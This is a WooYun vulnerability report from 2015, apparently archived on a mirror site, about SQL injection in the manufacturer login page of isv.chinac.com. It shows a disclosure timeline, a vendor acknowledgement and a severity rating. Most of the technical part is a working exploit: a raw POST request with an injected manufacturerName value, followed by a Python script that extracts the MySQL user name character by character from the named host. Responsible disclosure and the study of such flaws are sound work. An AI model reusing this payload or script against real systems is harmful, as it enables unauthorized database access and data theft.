乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-06: 细节已通知厂商并且等待厂商处理中 2015-07-07: 厂商已经确认,细节仅向厂商公开 2015-07-17: 细节向核心白帽子及相关领域专家公开 2015-07-27: 细节向普通白帽子公开 2015-08-06: 细节向实习白帽子公开 2015-08-21: 细节向公众公开
这个注入点sqlmap跑不出来,得用脚本~
POST /manufacturer_login.action HTTP/1.1Content-Length: 114Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://isv.chinac.com:80/manufacturer_tologin.actionCookie: cookie_user=""; login_password=""; JSESSIONID=61822C830DCA9CD25D92FE92038A772E; mssxskgj=1Host: isv.chinac.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*autoLogin=1&manufacturer.manufacturerName=-1' or length(user())=14 or 'n'='&manufacturer.password=g00dPa%24%24w0rD
为真时:
为假时:
user()长度为14:
user()结果:
脚本:
#encoding=utf-8import httplibimport timeimport stringimport sysimport randomimport urllibheaders = {'Content-Type': 'application/x-www-form-urlencoded'}payloads = list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')post_data = {"autoLogin":'1', "manufacturer.passwor":'p',}print 'Start to retrive MySQL User:\n'user = ''for i in range(1, 15): for payload in payloads: #time.sleep(4) print '.', conn = httplib.HTTPConnection('isv.chinac.com', timeout=60) s = "-1' or ascii(MID(user(),%d,1))=%s or 'n'=' " %(i, ord(payload)) post_data["manufacturer.manufacturerName"] = s postdata = urllib.urlencode(post_data) conn.request('POST', '/manufacturer_login.action', postdata, headers) html_doc = conn.getresponse().read().decode('utf-8') conn.close() #print html_doc if html_doc.find(u'该账户已经被删除') > 0: user += payload sys.stdout.write('\r[In Progress]' + user) sys.stdout.flush() breakprint '[Done]MySQL user is %s' % user
危害等级:中
漏洞Rank:10
确认时间:2015-07-07 11:21
谢谢支持。已在处理中
暂无